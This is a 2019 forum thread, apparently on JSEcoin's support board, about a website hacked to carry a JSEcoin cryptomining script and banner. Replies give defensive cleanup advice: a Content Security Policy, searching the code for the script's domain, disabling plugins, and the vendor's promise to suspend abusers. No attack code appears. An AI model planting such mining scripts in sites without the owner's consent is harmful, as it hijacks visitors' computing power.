This topic contains 21 replies, has 1 voice, and was last updated by James 2 weeks, 2 days ago.
March 4, 2019 at 11:01 am #8267
I would like to contact you as we have been hacked with a banner of your on our entire website. We are trying to contact your support but are not able to.
As shown in the comments below we tried the plugin thing and we tried to look were the script is but we are not able to find it.
Could you please help us or provide us a solution to solve the issue?March 4, 2019 at 12:18 pm #8268
Use a Content Security Policy on your site.
It’s not a way to remove scripts like JSE, but it prevents XSS, meaning that JSE domains can not longer send content to your site, your user’s browser will block it, so the JSE stuff will not be visible for your users and mining will be prevented.
Basically, it is just a list of allowed domains which can send information to your site: everything else will be blocked.March 4, 2019 at 1:13 pm #8269
Joanna, there are a number of plugin/addons that have added the JSEcoin snippet to their code (which is very wrong if you ask me). When you subsequently use that plugin/addon, you are mining/displaying advertisements. Perhaps you can search for a script with anything similar as:
https://load.jsecoin.com/load...and find out this way which script affects your site. Otherwise, provide your website url here so other people can search through your website for the JSEcoin script.
You can also try the answer of Marc, although this will work, it will not entirely solve the problem.March 4, 2019 at 1:35 pm #8270
I think the logical way to prevent situations like this in the future, is that JSE stops allowing codes registered to domain A to be used for domain B.
Now that Coinhive will stop, all amateur hackers need to find an alternative, and JSE looks a logical choice. It is just a matter of time till one of these imbeciles finds a way to prevent the JSE banner to show up.March 4, 2019 at 1:46 pm #8271
Yes, I completely agree with you on this one @Marc. I remember that they explained it would be to much of a hassle for us -the publishers- to implement this, as some publishers have thousands of websites. Perhaps @james, you can reconsider this, as it is really strange that plugins can be used to mine for JSEcoin / display advertisements without the website owner knowing. There must be a workaround possible for the publishers that have thousands of websites?March 4, 2019 at 2:05 pm #8272
JSE likes to exaggerate a bit, they say they have 20.000+ websites registered for mining.
But the daily distribution is around 288.000 joins or so…
Some simply maths: divide 288.000 coins by 20.000 websites, and you have the average earnings for each site.
You see my point? I think there are not more as a couple of hundreds (maybe thousands if there are enough web masters who are happy with 10 coins/day) legitimate sites using JSE. And unfortunately some hackers too…March 6, 2019 at 2:54 pm #8280
The 20,000 sites is the number of individual siteID’s that have been generated using the publisher setup. I agree this isn’t perfectly accurate but it’s not intentionally there to exaggerate. Same with the users, the user ID’s are just auto-incremental from 1 – 149000 so we say we have 149k users but some don’t log in any more, some were duplicate accounts, some are suspended etc.
Anyway on to the point in hand. Anyone using the jsecoin code in a plugin needs to get the webmasters permission to use the mining, otherwise we get problems like this which is bad for everyone. In this case however the header PHP file actually had the snippet hard coded into it which sounds more like a hack 🙁
Hopefully we aren’t going to become a monetization platform for hackers like Coinhive if we take action quickly before the 7 day pending period is over, which in this case it was. Also the opt-in banner is very obvious and hackers generally prefer discreetness.
I sent details via linkedin to Joanna but I’ll repeat it here in case anyone else has an issue:-
“Hi, is it a WordPress or flat html site?
If it’s a WordPress site it could be one of the plugins. Clear your optin data here: https://server.jsecoin.com/optclear/
Then try disabling them individually until the opt-in notification stops appearing. Could you let me know what plugin it was if this is the case.
If it’s a flat HTML site search the code for load.jsecoin.com and remove that entire code snippet from <script> tag to </script> tag. Again if you wouldn’t mind sharing the URL I can take a look.
If the site has actually been hacked or someone has included the code in a plugin without getting webmasters permission then we can suspend their account. Apologies for this. If there’s anything else I can do to help let me know.”